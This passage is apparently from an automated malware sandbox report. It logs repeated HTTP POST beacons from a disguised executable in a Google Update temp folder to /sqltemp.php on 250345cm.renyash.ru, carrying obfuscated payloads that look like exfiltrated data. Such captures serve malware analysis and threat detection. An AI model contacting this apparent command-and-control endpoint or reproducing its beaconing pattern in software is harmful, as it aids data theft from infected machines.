                                                                                                                  Data Raw: 39 38 0d 0a 00 1f 25 56 29 13 29 0e 26 22 30 1e 28 3d 23 55 31 10 36 5d 28 01 32 59 27 2d 23 58 3d 39 2f 1e 22 2c 25 5b 24 28 3b 07 34 2e 2f 12 25 34 2b 59 05 1c 20 42 21 06 34 5f 29 5b 28 05 26 2c 29 59 24 3e 23 05 2a 38 3c 54 23 15 09 5e 33 04 3c 5b 2a 04 33 0e 27 2c 30 02 2f 2c 36 0c 26 3a 2c 54 00 11 26 57 30 0f 33 01 20 09 01 05 36 1f 31 5f 25 34 04 1a 24 2c 09 1b 37 00 2d 01 31 1c 27 5f 21 33 25 07 31 3b 2d 5c 34 03 2c 0a 3d 2e 25 53 20 02 2d 48 05 3f 57 53 0d 0a 30 0d 0a 0d 0a
                                                                                                                  Data Ascii: 98%V))&"0(=#U16](2Y'-#X=9/",%[$(;4./%4+Y B!4_)[(&,)Y$>#*8<T#^3<[*3',0/,6&:,T&W03 61_%4$,7-1'_!3%1;-\4,=.%S -H?WS0


                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                  18192.168.2.662485104.21.38.84807048C:\Program Files (x86)\Google\Update\1.3.36.312\Recovery\GUR2DE8.tmp\AdbXCBUViTnoVBSsOq.exe
                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                  Jan 1, 2025 16:02:27.940432072 CET302OUTPOST /sqltemp.php HTTP/1.1
                                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                                                                                  Host: 250345cm.renyash.ru
                                                                                                                  Content-Length: 1124
                                                                                                                  Expect: 100-continue
                                                                                                                  Connection: Keep-Alive
                                                                                                                  Jan 1, 2025 16:02:28.297775030 CET1124OUTData Raw: 53 57 5f 5c 54 50 54 51 58 56 52 59 56 5c 59 50 5b 58 54 50 55 5e 50 5e 5a 5f 59 5c 54 58 55 5c 59 59 57 52 58 59 5a 5c 58 58 54 59 59 52 54 5d 53 50 5a 49 5a 5a 56 5e 51 58 51 58 5b 5e 57 5e 5a 5f 5e 5d 56 59 56 51 5e 5a 59 5f 5f 58 42 5e 54 5b
                                                                                                                  Data Ascii: SW_\TPTQXVRYV\YP[XTPU^P^Z_Y\TXU\YYWRXYZ\XXTYYRT]SPZIZZV^QXQX[^W^Z_^]VYVQ^ZY__XB^T[SV_YU]S]RQ_]VPS\\]\PB][RZ[\TC_X@TQXYYU]^X][W\[__X_[V[_X[URTXZPZ\TAPST^BXG^V^ZQA^^FP]U[U[P^U_TWYRZQX^]S.Y0)Z ?Y'-(;=U48*:+*X7#23?+6&7S::&Y.,Y-5
                                                                                                                  Jan 1, 2025 16:02:28.394246101 CET25INHTTP/1.1 100 Continue
                                                                                                                  Jan 1, 2025 16:02:28.651349068 CET811INHTTP/1.1 200 OK
                                                                                                                  Date: Wed, 01 Jan 2025 15:02:28 GMT
                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                  Transfer-Encoding: chunked
                                                                                                                  Connection: keep-alive
                                                                                                                  cf-cache-status: DYNAMIC
                                                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=1ZAxmpP%2FiKBDXb3eRokpRaPpLWvQrffyCTFTjfTqtV4fLupW0EkWiT%2BGZJhokqSwhGBFNxmUceJ%2BGBdU%2B3end%2BCGk3llGBs75zni9cYsOwNdPJsHE0x3iVeCoANm%2FXlVsWUp2Kmj"}],"group":"cf-nel","max_age":604800}
                                                                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                  Server: cloudflare
                                                                                                                  CF-RAY: 8fb363fb2e388c87-EWR
                                                                                                                  alt-svc: h3=":443"; ma=86400
                                                                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=8729&min_rtt=1979&rtt_var=14243&sent=2&recv=5&lost=0&retrans=0&sent_bytes=25&recv_bytes=1426&delivery_rate=26079&cwnd=213&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                  Data Raw: 34 0d 0a 32 57 5c 58 0d 0a 30 0d 0a 0d 0a
                                                                                                                  Data Ascii: 42W\X0


                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                  19192.168.2.662491104.21.38.84807048C:\Program Files (x86)\Google\Update\1.3.36.312\Recovery\GUR2DE8.tmp\AdbXCBUViTnoVBSsOq.exe
                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                  Jan 1, 2025 16:02:28.791610003 CET278OUTPOST /sqltemp.php HTTP/1.1
                                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                                                                                  Host: 250345cm.renyash.ru
                                                                                                                  Content-Length: 1124
                                                                                                                  Expect: 100-continue
                                                                                                                  Jan 1, 2025 16:02:29.141484022 CET1124OUTData Raw: 56 54 5f 5d 54 50 54 57 58 56 52 59 56 51 59 50 5b 59 54 5b 55 5e 50 5d 5a 5f 59 5c 54 58 55 5c 59 59 57 52 58 59 5a 5c 58 58 54 59 59 52 54 5d 53 50 5a 49 5a 5a 56 5e 51 58 51 58 5b 5e 57 5e 5a 5f 5e 5d 56 59 56 51 5e 5a 59 5f 5f 58 42 5e 54 5b
                                                                                                                  Data Ascii: VT_]TPTWXVRYVQYP[YT[U^P]Z_Y\TXU\YYWRXYZ\XXTYYRT]SPZIZZV^QXQX[^W^Z_^]VYVQ^ZY__XB^T[SV_YU]S]RQ_]VPS\\]\PB][RZ[\TC_X@TQXYYU]^X][W\[__X_[V[_X[URTXZPZ\TAPST^BXG^V^ZQA^^FP]U[U[P^U_TWYRZQX^]S.['=Y7?1X'<.:.#.3+7W*4+X?(9&?7-*&Y.,Y-
                                                                                                                  Jan 1, 2025 16:02:29.234605074 CET25INHTTP/1.1 100 Continue
                                                                                                                  Jan 1, 2025 16:02:29.491276026 CET807INHTTP/1.1 200 OK
                                                                                                                  Date: Wed, 01 Jan 2025 15:02:29 GMT
                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                  Transfer-Encoding: chunked
                                                                                                                  Connection: keep-alive
                                                                                                                  cf-cache-status: DYNAMIC
                                                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=dkspYOrYTwhsutXI0T9bvnOTDiY0hx3v1tbNd4earlszUvykHV%2BtvIePaklC0cB81JNQoYGNwYOn%2BHyvKa5%2Bl7kQtwvJlUnn13Jq9rU9bnICAwgVGb2BbVA2iOdLUTnohiyiY8c%2F"}],"group":"cf-nel","max_age":604800}
                                                                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                  Server: cloudflare
                                                                                                                  CF-RAY: 8fb364006a84c335-EWR
                                                                                                                  alt-svc: h3=":443"; ma=86400
                                                                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=6602&min_rtt=1616&rtt_var=10579&sent=3&recv=5&lost=0&retrans=0&sent_bytes=25&recv_bytes=1402&delivery_rate=35171&cwnd=164&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                  Data Raw: 34 0d 0a 32 57 5c 58 0d 0a 30 0d 0a 0d 0a
                                                                                                                  Data Ascii: 42W\X0


                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                  20192.168.2.662498104.21.38.84807048C:\Program Files (x86)\Google\Update\1.3.36.312\Recovery\GUR2DE8.tmp\AdbXCBUViTnoVBSsOq.exe
                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                  Jan 1, 2025 16:02:29.631804943 CET302OUTPOST /sqltemp.php HTTP/1.1
                                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                                                                                  Host: 250345cm.renyash.ru
                                                                                                                  Content-Length: 1124
                                                                                                                  Expect: 100-continue
                                                                                                                  Connection: Keep-Alive
                                                                                                                  Jan 1, 2025 16:02:29.985229969 CET1124OUTData Raw: 56 52 5a 53 51 58 51 55 58 56 52 59 56 5e 59 53 5b 5a 54 58 55 58 50 59 5a 5f 59 5c 54 58 55 5c 59 59 57 52 58 59 5a 5c 58 58 54 59 59 52 54 5d 53 50 5a 49 5a 5a 56 5e 51 58 51 58 5b 5e 57 5e 5a 5f 5e 5d 56 59 56 51 5e 5a 59 5f 5f 58 42 5e 54 5b
                                                                                                                  Data Ascii: VRZSQXQUXVRYV^YS[ZTXUXPYZ_Y\TXU\YYWRXYZ\XXTYYRT]SPZIZZV^QXQX[^W^Z_^]VYVQ^ZY__XB^T[SV_YU]S]RQ_]VPS\\]\PB][RZ[\TC_X@TQXYYU]^X][W\[__X_[V[_X[URTXZPZ\TAPST^BXG^V^ZQA^^FP]U[U[P^U_TWYRZQX^]S-3/*#!_$+.:=7>$*93>7 ++:$,;V9:&Y.,Y-
                                                                                                                  Jan 1, 2025 16:02:30.106494904 CET25INHTTP/1.1 100 Continue
                                                                                                                  Jan 1, 2025 16:02:30.294955969 CET811INHTTP/1.1 200 OK
                                                                                                                  Date: Wed, 01 Jan 2025 15:02:30 GMT
                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                  Transfer-Encoding: chunked
                                                                                                                  Connection: keep-alive
                                                                                                                  cf-cache-status: DYNAMIC
                                                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=q%2Bpoa%2F7atg6TrlgOjzJBV%2FscUEsVYa82j2KI%2B9wfDyFRGpLOw2Cu%2FPR4iS6GVEkecRM5LHcy%2BfB5oeYHktsu0yc1SQuJS3nqC7EYeq0EiFZeND7sopHq9lkJpRBP46LXOAf7ngYy"}],"group":"cf-nel","max_age":604800}
                                                                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                  Server: cloudflare
                                                                                                                  CF-RAY: 8fb36405d83e43f7-EWR
                                                                                                                  alt-svc: h3=":443"; ma=86400
                                                                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=8357&min_rtt=2446&rtt_var=12739&sent=2&recv=5&lost=0&retrans=0&sent_bytes=25&recv_bytes=1426&delivery_rate=29355&cwnd=212&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                  Data Raw: 34 0d 0a 32 57 5c 58 0d 0a 30 0d 0a 0d 0a
                                                                                                                  Data Ascii: 42W\X0


                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                  21192.168.2.662504104.21.38.84807048C:\Program Files (x86)\Google\Update\1.3.36.312\Recovery\GUR2DE8.tmp\AdbXCBUViTnoVBSsOq.exe
                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                  Jan 1, 2025 16:02:30.503562927 CET302OUTPOST /sqltemp.php HTTP/1.1
                                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                                                                                  Host: 250345cm.renyash.ru
                                                                                                                  Content-Length: 1124
                                                                                                                  Expect: 100-continue
                                                                                                                  Connection: Keep-Alive
                                                                                                                  Jan 1, 2025 16:02:30.860203028 CET1124OUTData Raw: 56 55 5f 50 51 5b 51 56 58 56 52 59 56 5a 59 52 5b 5f 54 58 55 5e 50 5b 5a 5f 59 5c 54 58 55 5c 59 59 57 52 58 59 5a 5c 58 58 54 59 59 52 54 5d 53 50 5a 49 5a 5a 56 5e 51 58 51 58 5b 5e 57 5e 5a 5f 5e 5d 56 59 56 51 5e 5a 59 5f 5f 58 42 5e 54 5b
                                                                                                                  Data Ascii: VU_PQ[QVXVRYVZYR[_TXU^P[Z_Y\TXU\YYWRXYZ\XXTYYRT]SPZIZZV^QXQX[^W^Z_^]VYVQ^ZY__XB^T[SV_YU]S]RQ_]VPS\\]\PB][RZ[\TC_X@TQXYYU]^X][W\[__X_[V[_X[URTXZPZ\TAPST^BXG^V^ZQA^^FP]U[U[P^U_TWYRZQX^]S.Y0?6#=3 /\>#*)V*$Y4"?;%1/V9*&Y.,Y--
                                                                                                                  Jan 1, 2025 16:02:30.957477093 CET25INHTTP/1.1 100 Continue
                                                                                                                  Jan 1, 2025 16:02:31.220752001 CET808INHTTP/1.1 200 OK
                                                                                                                  Date: Wed, 01 Jan 2025 15:02:31 GMT
                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                  Transfer-Encoding: chunked
                                                                                                                  Connection: keep-alive
                                                                                                                  cf-cache-status: DYNAMIC
                                                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Rhfr1DQ%2BkTIoJGWR3g0Z5G6xdGL%2F%2Br46Bx6OHVCHU0501HGD3yw7cXwcG2fnm3YDeuWKQL7cODtyjVgJb6mu3qCzmdQ%2B7TPIxCErXdlM7sYmkHbkRxapxUnSbSpb3J%2BPnTzfccl6"}],"group":"cf-nel","max_age":604800}
                                                                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                  Server: cloudflare
                                                                                                                  CF-RAY: 8fb3640b3ddb421f-EWR
                                                                                                                  alt-svc: h3=":443"; ma=86400
                                                                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=4820&min_rtt=2010&rtt_var=6375&sent=2&recv=5&lost=0&retrans=0&sent_bytes=25&recv_bytes=1426&delivery_rate=59599&cwnd=239&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                  Data Raw: 34 0d 0a 32 57 5c 58 0d 0a 30 0d 0a 0d 0a
                                                                                                                  Data Ascii: 42W\X0


                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                  22192.168.2.662511104.21.38.84807048C:\Program Files (x86)\Google\Update\1.3.36.312\Recovery\GUR2DE8.tmp\AdbXCBUViTnoVBSsOq.exe
                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                  Jan 1, 2025 16:02:31.363782883 CET302OUTPOST /sqltemp.php HTTP/1.1
                                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                                                                                  Host: 250345cm.renyash.ru
                                                                                                                  Content-Length: 1124
                                                                                                                  Expect: 100-continue
                                                                                                                  Connection: Keep-Alive
                                                                                                                  Jan 1, 2025 16:02:31.719568014 CET1124OUTData Raw: 53 52 5f 55 54 58 51 56 58 56 52 59 56 5c 59 52 5b 5c 54 5b 55 5a 50 5a 5a 5f 59 5c 54 58 55 5c 59 59 57 52 58 59 5a 5c 58 58 54 59 59 52 54 5d 53 50 5a 49 5a 5a 56 5e 51 58 51 58 5b 5e 57 5e 5a 5f 5e 5d 56 59 56 51 5e 5a 59 5f 5f 58 42 5e 54 5b
                                                                                                                  Data Ascii: SR_UTXQVXVRYV\YR[\T[UZPZZ_Y\TXU\YYWRXYZ\XXTYYRT]SPZIZZV^QXQX[^W^Z_^]VYVQ^ZY__XB^T[SV_YU]S]RQ_]VPS\\]\PB][RZ[\TC_X@TQXYYU]^X][W\[__X_[V[_X[URTXZPZ\TAPST^BXG^V^ZQA^^FP]U[U[P^U_TWYRZQX^]S-0X41_',*!T#<^+94># *;5C1V.*&Y.,Y-5
                                                                                                                  Jan 1, 2025 16:02:31.808577061 CET25INHTTP/1.1 100 Continue
                                                                                                                  Jan 1, 2025 16:02:32.077609062 CET807INHTTP/1.1 200 OK
                                                                                                                  Date: Wed, 01 Jan 2025 15:02:32 GMT
                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                  Transfer-Encoding: chunked
                                                                                                                  Connection: keep-alive
                                                                                                                  cf-cache-status: DYNAMIC
                                                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=ZS6XVbu4I4a0I%2B12Mqf%2B6X8bFwf0Bzg49EtY7s2Bpt8VB72qlsqpXooBIXuCiLQWMa4hZts44EcW%2BajrcORtycMPYp35rSQsEmXvmn%2FMnxiZpyykg1x7B2CICh2YyHzTFHZBOsjv"}],"group":"cf-nel","max_age":604800}
                                                                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                  Server: cloudflare
                                                                                                                  CF-RAY: 8fb364108923c329-EWR
                                                                                                                  alt-svc: h3=":443"; ma=86400
                                                                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=2007&min_rtt=1658&rtt_var=1320&sent=4&recv=5&lost=0&retrans=0&sent_bytes=25&recv_bytes=1426&delivery_rate=327942&cwnd=147&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                  Data Raw: 34 0d 0a 32 57 5c 58 0d 0a 30 0d 0a 0d 0a
                                                                                                                  Data Ascii: 42W\X0


                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                  23192.168.2.662519104.21.38.84807048C:\Program Files (x86)\Google\Update\1.3.36.312\Recovery\GUR2DE8.tmp\AdbXCBUViTnoVBSsOq.exe
                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                  Jan 1, 2025 16:02:32.223767042 CET302OUTPOST /sqltemp.php HTTP/1.1
                                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                                                                                  Host: 250345cm.renyash.ru
                                                                                                                  Content-Length: 1124
                                                                                                                  Expect: 100-continue
                                                                                                                  Connection: Keep-Alive
                                                                                                                  Jan 1, 2025 16:02:32.580070019 CET1124OUTData Raw: 53 54 5f 52 54 5c 54 56 58 56 52 59 56 5a 59 56 5b 5d 54 5e 55 55 50 5e 5a 5f 59 5c 54 58 55 5c 59 59 57 52 58 59 5a 5c 58 58 54 59 59 52 54 5d 53 50 5a 49 5a 5a 56 5e 51 58 51 58 5b 5e 57 5e 5a 5f 5e 5d 56 59 56 51 5e 5a 59 5f 5f 58 42 5e 54 5b
                                                                                                                  Data Ascii: ST_RT\TVXVRYVZYV[]T^UUP^Z_Y\TXU\YYWRXYZ\XXTYYRT]SPZIZZV^QXQX[^W^Z_^]VYVQ^ZY__XB^T[SV_YU]S]RQ_]VPS\\]\PB][RZ[\TC_X@TQXYYU]^X][W\[__X_[V[_X[URTXZPZ\TAPST^BXG^V^ZQA^^FP]U[U[P^U_TWYRZQX^]S-'Y:4?*'.$.9!T!-$Y+9<). 2<E%?'S-:&Y.,Y--
                                                                                                                  Jan 1, 2025 16:02:32.677578926 CET25INHTTP/1.1 100 Continue
                                                                                                                  Jan 1, 2025 16:02:32.945198059 CET802INHTTP/1.1 200 OK
                                                                                                                  Date: Wed, 01 Jan 2025 15:02:32 GMT
                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                  Transfer-Encoding: chunked
                                                                                                                  Connection: keep-alive
                                                                                                                  cf-cache-status: DYNAMIC
                                                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Kkf1I1Zx1Dfg4aM13eZ0DyW%2FrTADTg0k4bM3HbSmQEVIDarg4f2HiqKjlCRUqNfeJdwzIin3PdZ5DJy04Lx2akOcbPjoy2DI6uqwXbjWixKdz0H79A8j4odppsvN%2BMpzBn2szvEC"}],"group":"cf-nel","max_age":604800}
                                                                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                  Server: cloudflare
                                                                                                                  CF-RAY: 8fb36415ff72efa1-EWR
                                                                                                                  alt-svc: h3=":443"; ma=86400
                                                                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=4560&min_rtt=1965&rtt_var=5928&sent=2&recv=5&lost=0&retrans=0&sent_bytes=25&recv_bytes=1426&delivery_rate=64235&cwnd=164&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                  Data Raw: 34 0d 0a 32 57 5c 58 0d 0a 30 0d 0a 0d 0a
                                                                                                                  Data Ascii: 42W\X0


                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                  24192.168.2.662525104.21.38.84807048C:\Program Files (x86)\Google\Update\1.3.36.312\Recovery\GUR2DE8.tmp\AdbXCBUViTnoVBSsOq.exe
                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                  Jan 1, 2025 16:02:33.190606117 CET302OUTPOST /sqltemp.php HTTP/1.1
                                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                                                                                  Host: 250345cm.renyash.ru
                                                                                                                  Content-Length: 1124
                                                                                                                  Expect: 100-continue
                                                                                                                  Connection: Keep-Alive


                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                  25192.168.2.662528104.21.38.84807048C:\Program Files (x86)\Google\Update\1.3.36.312\Recovery\GUR2DE8.tmp\AdbXCBUViTnoVBSsOq.exe
                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                  Jan 1, 2025 16:02:33.444891930 CET302OUTPOST /sqltemp.php HTTP/1.1
                                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                                                                                  Host: 250345cm.renyash.ru
                                                                                                                  Content-Length: 1964
                                                                                                                  Expect: 100-continue
                                                                                                                  Connection: Keep-Alive
                                                                                                                  Jan 1, 2025 16:02:33.797719002 CET1964OUTData Raw: 53 50 5a 56 54 50 54 5c 58 56 52 59 56 5e 59 53 5b 5e 54 51 55 58 50 5c 5a 5f 59 5c 54 58 55 5c 59 59 57 52 58 59 5a 5c 58 58 54 59 59 52 54 5d 53 50 5a 49 5a 5a 56 5e 51 58 51 58 5b 5e 57 5e 5a 5f 5e 5d 56 59 56 51 5e 5a 59 5f 5f 58 42 5e 54 5b
                                                                                                                  Data Ascii: SPZVTPT\XVRYV^YS[^TQUXP\Z_Y\TXU\YYWRXYZ\XXTYYRT]SPZIZZV^QXQX[^W^Z_^]VYVQ^ZY__XB^T[SV_YU]S]RQ_]VPS\\]\PB][RZ[\TC_X@TQXYYU]^X][W\[__X_[V[_X[URTXZPZ\TAPST^BXG^V^ZQA^^FP]U[U[P^U_TWYRZQX^]S-'[4]$4.9.7=$Z<94=-;42<*(%A&(-&Y.,Y-
                                                                                                                  Jan 1, 2025 16:02:33.899545908 CET25INHTTP/1.1 100 Continue
                                                                                                                  Jan 1, 2025 16:02:34.165894985 CET959INHTTP/1.1 200 OK
                                                                                                                  Date: Wed, 01 Jan 2025 15:02:34 GMT
                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                  Transfer-Encoding: chunked
                                                                                                                  Connection: keep-alive
                                                                                                                  cf-cache-status: DYNAMIC
                                                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=OevC1TkzlXRKJyU%2F3H1y%2B%2B9kXdw3T4cF71Um4%2F7MZ8e0STXrORgfY4K7Dtd54mEyj%2FMFbkOxYg4sx4YoZboEm1YBFhuDWm4ZccNduHWj0T3DJwzP%2BZhvMQBBJLMeLF8EPTp67trx"}],"group":"cf-nel","max_age":604800}
                                                                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                  Server: cloudflare
                                                                                                                  CF-RAY: 8fb3641d9f36c425-EWR
                                                                                                                  alt-svc: h3=":443"; ma=86400
                                                                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=3966&min_rtt=1490&rtt_var=5511&sent=3&recv=6&lost=0&retrans=0&sent_bytes=25&recv_bytes=2266&delivery_rate=68538&cwnd=239&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                  Data Raw: 39 38 0d 0a 00 1f 25 51 2a 13 04 55 24 21 2b 02 3c 3d 06 0c 32 2d 36 58 2b 38 00 1a 27 3e 0d 5a 3d 29 20 04 21 05 3d 5f 25 28 01 06 20 3d 30 07 27 1e 2b 59 05 1c 23 1d 21 3f 24 5e 3d 04 27 5d 31 59 35 5a 27 10 0a 14 3f 3b 28 1e 23 05 30 03 24 3d 15 05 3d 03 30 57 24 2f 37 5b 2f 3c 32 0b 27 3a 2c 54 00 11 25 09 27 08 28 5f 20 09 05 03 35 32 36 03 25 1a 2a 1b 26 3c 02 09 23 29 22 15 26 22 06 02 22 55 2e 5a 31 15 0c 04 34 03 27 51 28 3e 25 53 20 02 2d 48 05 3f 57 53 0d 0a 30 0d 0a 0d 0a
                                                                                                                  Data Ascii: 98%Q*U$!+<=2-6X+8'>Z=) !=_%( =0'+Y#!?$^=']1Y5Z'?;(#0$==0W$/7[/<2':,T%'(_ 526%*&<#)"&""U.Z14'Q(>%S -H?WS0


                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                  26192.168.2.662529104.21.38.84807048C:\Program Files (x86)\Google\Update\1.3.36.312\Recovery\GUR2DE8.tmp\AdbXCBUViTnoVBSsOq.exe
                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                  Jan 1, 2025 16:02:33.568968058 CET302OUTPOST /sqltemp.php HTTP/1.1
                                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                                                                                  Host: 250345cm.renyash.ru
                                                                                                                  Content-Length: 1124
                                                                                                                  Expect: 100-continue
                                                                                                                  Connection: Keep-Alive
                                                                                                                  Jan 1, 2025 16:02:33.922678947 CET1124OUTData Raw: 53 50 5a 50 51 5b 54 50 58 56 52 59 56 5a 59 56 5b 52 54 5d 55 54 50 55 5a 5f 59 5c 54 58 55 5c 59 59 57 52 58 59 5a 5c 58 58 54 59 59 52 54 5d 53 50 5a 49 5a 5a 56 5e 51 58 51 58 5b 5e 57 5e 5a 5f 5e 5d 56 59 56 51 5e 5a 59 5f 5f 58 42 5e 54 5b
                                                                                                                  Data Ascii: SPZPQ[TPXVRYVZYV[RT]UTPUZ_Y\TXU\YYWRXYZ\XXTYYRT]SPZIZZV^QXQX[^W^Z_^]VYVQ^ZY__XB^T[SV_YU]S]RQ_]VPS\\]\PB][RZ[\TC_X@TQXYYU]^X][W\[__X_[V[_X[URTXZPZ\TAPST^BXG^V^ZQA^^FP]U[U[P^U_TWYRZQX^]S-0:#<=_33E/:=W7$_*:7=.( T7?;=C%?/-:&Y.,Y--
                                                                                                                  Jan 1, 2025 16:02:34.014158010 CET25INHTTP/1.1 100 Continue
                                                                                                                  Jan 1, 2025 16:02:34.283144951 CET806INHTTP/1.1 200 OK
                                                                                                                  Date: Wed, 01 Jan 2025 15:02:34 GMT
                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                  Transfer-Encoding: chunked
                                                                                                                  Connection: keep-alive
                                                                                                                  cf-cache-status: DYNAMIC
                                                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=SBWXnbrJZufsxP%2BBboKhahFZ0n3%2FzEVju3W3fZjWkYEsJhJ2SOXL1zeT1WatHoGI%2FP1RXoIwvhCdQqtJI5HnmOWFMyQPUkUFxmVY3PQS2pWwcv7XmmzG9bekG9C8z%2FK7HQdzEJVu"}],"group":"cf-nel","max_age":604800}
                                                                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                  Server: cloudflare
                                                                                                                  CF-RAY: 8fb3641e4a0d728f-EWR
                                                                                                                  alt-svc: h3=":443"; ma=86400
                                                                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=2105&min_rtt=2004&rtt_var=955&sent=3&recv=5&lost=0&retrans=0&sent_bytes=25&recv_bytes=1426&delivery_rate=517914&cwnd=148&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                  Data Raw: 34 0d 0a 32 57 5c 58 0d 0a 30 0d 0a 0d 0a
                                                                                                                  Data Ascii: 42W\X0


                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                  27192.168.2.662535104.21.38.84807048C:\Program Files (x86)\Google\Update\1.3.36.312\Recovery\GUR2DE8.tmp\AdbXCBUViTnoVBSsOq.exe
                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                  Jan 1, 2025 16:02:34.410774946 CET278OUTPOST /sqltemp.php HTTP/1.1
                                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                                                                                  Host: 250345cm.renyash.ru
                                                                                                                  Content-Length: 1124
                                                                                                                  Expect: 100-continue
